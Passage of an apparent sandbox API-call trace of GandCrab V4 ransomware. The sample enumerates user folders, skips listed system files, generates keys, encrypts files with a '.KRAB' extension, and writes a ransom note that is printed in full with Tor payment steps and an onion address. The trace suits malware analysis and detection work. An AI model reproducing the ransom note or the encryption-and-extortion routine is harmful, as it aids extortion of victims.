[0098.276] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0098.277] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini" [0098.277] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.277] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini.KRAB") returned 47 [0098.277] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini") returned 42 [0098.277] lstrlenW (lpString=".ini") returned 4 [0098.277] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.277] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0098.277] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.278] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini") returned 42 [0098.278] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\desktop.ini") returned 42 [0098.278] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0098.278] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.278] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.278] lstrcmpW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0098.278] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0098.278] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="Everywhere.search-ms" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms" [0098.278] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.279] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms.KRAB") returned 56 [0098.279] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms") returned 51 [0098.279] lstrlenW (lpString=".search-ms") returned 10 [0098.279] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.279] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".search-ms ") returned 11 [0098.279] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.279] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms") returned 51 [0098.279] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms") returned 51 [0098.279] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="desktop.ini") returned 1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="autorun.inf") returned 1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat") returned -1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="iconcache.db") returned -1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="bootsect.bak") returned 1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="boot.ini") returned 1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat.log") returned -1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="thumbs.db") returned -1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="KRAB-DECRYPT.html") returned -1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntldr") returned -1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="NTDETECT.COM") returned -1 [0098.280] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Bootfont.bin") returned 1 [0098.280] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.280] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.281] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.281] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.281] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.282] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.282] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.282] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.282] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.283] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.283] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.283] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.283] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.283] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.283] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.284] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011678) returned 1 [0098.284] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.284] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.284] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.284] GetLastError () returned 0x0 [0098.285] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.285] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0098.285] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0098.285] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.285] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.285] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.285] GetLastError () returned 0x0 [0098.285] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.286] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.286] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0098.286] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.286] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.287] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.287] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0098.287] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0098.287] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="Indexed Locations.search-ms" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms" [0098.287] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.287] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms.KRAB") returned 63 [0098.287] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms") returned 58 [0098.287] lstrlenW (lpString=".search-ms") returned 10 [0098.287] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.287] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".search-ms ") returned 11 [0098.288] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.288] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms") returned 58 [0098.288] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms") returned 58 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="desktop.ini") returned 1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="autorun.inf") returned 1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat") returned -1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="iconcache.db") returned 1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="bootsect.bak") returned 1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="boot.ini") returned 1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat.log") returned -1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="thumbs.db") returned -1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="KRAB-DECRYPT.html") returned -1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntldr") returned -1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="NTDETECT.COM") returned -1 [0098.288] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Bootfont.bin") returned 1 [0098.288] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.289] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.289] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.290] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.290] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.290] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.290] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.290] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.290] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0098.291] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.291] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.291] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.291] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.291] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0098.291] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.292] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0098.292] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0098.292] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.292] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.292] GetLastError () returned 0x0 [0098.293] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0098.293] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.293] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010e80) returned 1 [0098.293] CryptImportKey (in: hProv=0x1010e80, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.293] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.293] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.293] GetLastError () returned 0x0 [0098.294] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.294] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0098.294] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0098.294] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.294] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.294] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.295] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0098.295] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0098.295] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\KRAB-DECRYPT.txt" [0098.295] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.295] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\KRAB-DECRYPT.txt.KRAB") returned 52 [0098.295] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\KRAB-DECRYPT.txt") returned 47 [0098.295] lstrlenW (lpString=".txt") returned 4 [0098.295] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.295] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0098.295] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.296] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\KRAB-DECRYPT.txt") returned 47 [0098.296] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Searches\\KRAB-DECRYPT.txt") returned 47 [0098.296] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0098.296] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0098.296] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0098.296] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0098.296] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0098.296] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0098.296] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0098.296] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0098.296] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0098.296] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0098.296] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.296] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0098.297] FindClose (in: hFindFile=0xfbd920 | out: hFindFile=0xfbd920) returned 1 [0098.297] CloseHandle (hObject=0x320) returned 1 [0098.297] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0098.297] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0098.297] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0098.297] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="SendTo" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\SendTo") returned="C:\\Users\\CIiHmnxMn6Ps\\SendTo" [0098.297] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\") returned="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\" [0098.297] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0098.297] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0098.297] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0098.297] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0098.297] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0098.298] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.298] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.298] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\\\KRAB-DECRYPT.txt") returned 46 [0098.298] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\sendto\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0098.302] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0098.302] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0098.303] CloseHandle (hObject=0x320) returned 1 [0098.303] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.303] VirtualAlloc (lpAddress=0x0, dwSize=0x410, 